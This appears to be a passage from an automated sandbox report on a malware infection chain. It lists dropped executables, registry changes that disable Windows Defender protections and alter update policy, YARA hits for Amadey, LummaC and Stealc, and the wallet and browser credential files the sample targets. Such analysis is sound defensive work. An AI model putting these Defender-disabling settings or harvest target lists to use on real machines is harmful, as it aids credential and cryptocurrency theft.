                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00960B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,34_2_00960B62
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00961663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,34_2_00961663
                      Source: c6e8248d4e.exe, 00000022.00000002.2110937860.00000000009C2000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: c6e8248d4e.exeBinary or memory string: Shell_TrayWnd
                      Source: rapes.exe, rapes.exe, 0000001C.00000002.2112228521.0000000000625000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: `'Program Manager
                      Source: ab5415a7b5.exe, 00000035.00000002.2095590801.0000000000EF1000.00000040.00000001.01000000.00000017.sdmpBinary or memory string: ?*lProgram Manager
                      Source: bb5ad48269.exe, 00000036.00000002.1990503385.0000000001286000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: hProgram Manager
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_00459AB5 cpuid 28_2_00459AB5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128590121\am_no.cmd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10128590121\am_no.cmd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\spoolsv.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_004593A7 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,28_2_004593A7
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_004361F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegOpenKeyExA,RegEnumValueA,DeleteObject,DeleteObject,DeleteObject,LookupAccountNameA,28_2_004361F0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0093B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,34_2_0093B952
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,34_2_009042DE
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Disable Windows Defender notifications (registry)
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                      Disable Windows Defender real time protection (registry)
                      Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                      Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                      Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1
                      Disables Windows Defender Tamper protection
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeRegistry value created: TamperProtection 0
                      Modifies windows update settings
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
                      Source: 19be97887a.exe, 0000001E.00000003.1888188996.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1867412739.0000000000D76000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1867210058.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1867210058.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1869981140.0000000000D77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Windows\System32\spoolsv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Amadey
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Yara detected Amadeys Clipper DLL
                      Source: Yara matchFile source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000003.1515506274.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.987805993.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.993370074.0000000000301000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.1028077488.0000000000431000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.967837133.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2109764248.0000000000431000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1009481063.0000000000301000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1010976873.0000000000431000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.952949007.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Credential Flusher
                      Source: Yara matchFile source: Process Memory Space: c6e8248d4e.exe PID: 6080, type: MEMORYSTR
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: 35.2.19be97887a.exe.e20000.0.unpack, type: UNPACKEDPE
                      Yara detected Stealc
                      Source: Yara matchFile source: 00000036.00000003.1948179949.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1814440673.0000000000EC1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.1774138990.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000036.00000002.1990082511.0000000000EC1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: bb5ad48269.exe PID: 5724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bb5ad48269.exe PID: 6960, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: 19be97887a.exe, 0000001E.00000003.2004127745.0000000000D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: allets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\walle
                      Source: 19be97887a.exe, 0000001E.00000003.2004127745.0000000000D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":y
                      Source: 19be97887a.exe, 0000001E.00000003.1888188996.0000000000D54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: enllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmxb
                      Source: 19be97887a.exe, 0000001E.00000003.2005526460.0000000000D1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                      Source: 19be97887a.exe, 0000001E.00000003.1861959536.0000000000D1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: 19be97887a.exe, 0000001E.00000003.1832303187.0000000000D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                      Source: 19be97887a.exe, 0000001E.00000003.1832789599.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
                      Source: 19be97887a.exe, 00000023.00000002.2114874783.0000000000D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                      Source: powershell.exe, 0000000C.00000002.985320778.00007FF9367B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
